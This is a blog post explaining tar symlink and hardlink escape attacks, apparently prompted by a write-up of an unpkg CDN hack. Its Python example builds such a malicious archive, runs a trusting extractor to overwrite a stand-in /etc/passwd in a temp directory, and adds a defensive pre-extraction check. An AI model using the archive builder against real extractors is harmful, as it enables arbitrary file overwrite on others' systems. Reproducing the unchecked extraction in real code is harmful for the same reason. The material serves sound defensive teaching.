14 hours ago · Tech · 0 comments

I was recently reading Max Justicz's blog post, where he outlined how he was able to hack the unpkg.com CDN by getting the service to extract a tar file that contained one of two member sequences:

- A symlink to a directory on the system, followed by a regular file whose path goes through that symlink.
- A hardlink pointing to a known file on the system, followed by a regular file named the same as that hardlink.

In practical terms, this means, respectively:

- Create a symlink named link pointing to /tmp, then extract a file to link/oops.txt. The extractor follows the symlink and writes /tmp/oops.txt.
- Create a hardlink foo to a file that already exists (/etc/passwd, for example), then unpack a regular file named foo. Opening foo for writing goes through the hardlink to the same inode, so this overwrites /etc/passwd in place.

These attacks are pretty similar to the classic zip-slip vulnerabilities, which typically entail an archive containing a file path like ../../some/target/file or /some/target/file, causing the extractor to write outside of the intended destination directory. Sometimes symlinks are involved in the classic zip-slip vulnerabilities, but those are…
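The two sequences above, as an added example (this is not code from the post or from unpkg): it builds such a tar in memory with Python's tarfile module, shows what an extractor that trusts every member does with it, and then checks members in archive order so the archive is refused. The file names (link, link/oops.txt, foo, passwd), the payload bytes and the temporary directories that stand in for /tmp and /etc are all constructed for the demo.

```python
"""Added example: tar symlink/hardlink escapes and a pre-extraction check.
Names, contents and directories are constructed for the demo (stand-ins
for the post's /tmp and /etc); nothing outside a temp dir is touched."""
import io
import os
import tarfile
import tempfile

PAYLOAD = b"attacker controlled\n"


def build_malicious_tar(outside_dir: str) -> bytes:
    """Tar with the symlink+file and hardlink+file pairs, built in memory."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tf:
        # Trick 1: symlink "link" -> outside_dir, then a file under "link/".
        # A trusting extractor follows the symlink and writes outside_dir/oops.txt.
        sym = tarfile.TarInfo("link")
        sym.type, sym.linkname = tarfile.SYMTYPE, outside_dir
        tf.addfile(sym)
        oops = tarfile.TarInfo("link/oops.txt")
        oops.size = len(PAYLOAD)
        tf.addfile(oops, io.BytesIO(PAYLOAD))
        # Trick 2: hardlink "foo" -> an existing file outside, then a regular
        # file also named "foo". Opening "foo" for writing truncates and
        # rewrites the shared inode, i.e. outside_dir/passwd is overwritten.
        hard = tarfile.TarInfo("foo")
        hard.type, hard.linkname = tarfile.LNKTYPE, os.path.join(outside_dir, "passwd")
        tf.addfile(hard)
        foo = tarfile.TarInfo("foo")
        foo.size = len(PAYLOAD)
        tf.addfile(foo, io.BytesIO(PAYLOAD))
    return buf.getvalue()


def build_benign_tar() -> bytes:
    """Harmless archive: one file plus a relative symlink to it."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tf:
        a = tarfile.TarInfo("a.txt")
        a.size = len(PAYLOAD)
        tf.addfile(a, io.BytesIO(PAYLOAD))
        b = tarfile.TarInfo("b")
        b.type, b.linkname = tarfile.SYMTYPE, "a.txt"
        tf.addfile(b)
    return buf.getvalue()


def find_escapes(tar_bytes: bytes, dest: str) -> list:
    """(member, reason) for every member that would write outside dest.

    Members are checked in archive order, remembering links already seen,
    because the ordering (link first, file second) is what the attacks rely on.
    The check is purely lexical and never consults the filesystem."""
    dest = os.path.normpath(os.path.abspath(dest))
    symlinks = []       # symlink members seen so far
    bad_hardlinks = {}  # hardlink member -> outside target
    problems = []

    def inside(path: str) -> bool:
        path = os.path.normpath(path)
        return path == dest or path.startswith(dest + os.sep)

    with tarfile.open(fileobj=io.BytesIO(tar_bytes)) as tf:
        for m in tf:
            full = os.path.normpath(os.path.join(dest, m.name))
            if not inside(full):  # classic zip-slip: ../ or absolute name
                problems.append((m.name, "path escapes destination"))
            elif any(m.name == s or m.name.startswith(s + "/") for s in symlinks):
                problems.append((m.name, "path reuses or passes through an earlier symlink"))
            elif m.issym():
                target = m.linkname if os.path.isabs(m.linkname) \
                    else os.path.join(os.path.dirname(full), m.linkname)
                if not inside(target):
                    problems.append((m.name, "symlink target outside destination"))
                symlinks.append(m.name)
            elif m.islnk():
                # Same resolution tarfile uses: an absolute linkname wins over dest.
                target = os.path.normpath(os.path.join(dest, m.linkname))
                if not inside(target):
                    problems.append((m.name, "hardlink target outside destination"))
                    bad_hardlinks[m.name] = target
            elif m.isreg() and m.name in bad_hardlinks:
                problems.append((m.name, "would overwrite " + bad_hardlinks[m.name]
                                 + " through the earlier hardlink"))
    return problems


def extract_unchecked(tar_bytes: bytes, dest: str) -> None:
    """What a trusting extractor does (no PEP 706 filter applied)."""
    with tarfile.open(fileobj=io.BytesIO(tar_bytes)) as tf:
        try:
            tf.extractall(dest, filter="fully_trusted")
        except TypeError:  # older Python without the filter argument: same behaviour
            tf.extractall(dest)


def safe_extract(tar_bytes: bytes, dest: str) -> None:
    """Refuse the whole archive if any member would escape dest."""
    problems = find_escapes(tar_bytes, dest)
    if problems:
        raise ValueError("refusing to extract: " + "; ".join(n + ": " + w for n, w in problems))
    extract_unchecked(tar_bytes, dest)


def demo() -> dict:
    """Run the checked and the trusting extractor; report what each did."""
    with tempfile.TemporaryDirectory() as root:
        outside = os.path.join(root, "outside")  # plays the role of /tmp and /etc
        dest = os.path.join(root, "dest")
        os.makedirs(outside)
        os.makedirs(dest)
        passwd = os.path.join(outside, "passwd")
        with open(passwd, "wb") as f:
            f.write(b"root:x:0:0:root:/root:/bin/sh\n")  # constructed stand-in
        evil = build_malicious_tar(outside)
        problems = [name for name, _ in find_escapes(evil, dest)]
        try:
            safe_extract(evil, dest)
            refused = False
        except ValueError:
            refused = True
        extract_unchecked(evil, dest)  # the trusting path: both escapes land
        with open(passwd, "rb") as f:
            overwritten = f.read() == PAYLOAD
        return {"problems": problems, "refused": refused,
                "oops_written_outside": os.path.exists(os.path.join(outside, "oops.txt")),
                "passwd_overwritten": overwritten}


if __name__ == "__main__":
    print(demo())
```

The check is lexical and assumes the destination is a fresh, empty directory: a symlink that already exists under dest before extraction is not something the archive scan can see, so extract into a new directory every time. Python 3.12+ (and the backported releases) offer `extractall(..., filter="data")`, which applies a comparable policy from PEP 706; passing `filter="fully_trusted"` above is what makes the trusting path reproduce the escapes on those versions.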
